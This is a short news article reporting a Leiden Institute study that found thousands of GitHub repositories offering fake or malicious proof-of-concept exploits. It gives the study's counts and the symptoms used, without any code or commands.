Researchers discovered thousands of GitHub repositories that offer fake proof-of-concept (PoC) exploits for various flaws used to distribute malware.
A team of researchers at the Leiden Institute of Advanced Computer Science (Soufian El Yadmani, Robin The, Olga Gadyatskaya) discovered thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for multiple vulnerabilities.
The experts analyzed PoCs shared on GitHub for known vulnerabilities discovered in 2017-2021, some of these repositories were used by threat actors to spread malware.
The experts pointed out that public code repositories do not provide any guarantees that any given PoC comes from a trustworthy source.
“We discovered that not all PoCs are trustworthy. Some proof-of-concepts are fake (i.e., they do not actually offer PoC functionality), or even malicious: e.g., they attempt to exfiltrate data from the system they are being run on, or they try to install malware on this system.” reads the research paper published by the experts.
The team focused on a set of symptoms observed in the collected dataset, such as calls to malicious IP addresses, encoded malicious code, or included Trojanized binaries. The boffins analyzed 47313 repositories and 4893 of them were malicious repositories (i.e. 10.3% of the studied repositories have symptoms of malicious intent).
“This figure shows a worrying prevalence of dangerous malicious PoCs among the exploit code distributed on GitHub.” continues the paper.
< ..
Support the originator by clicking the read the rest link below.
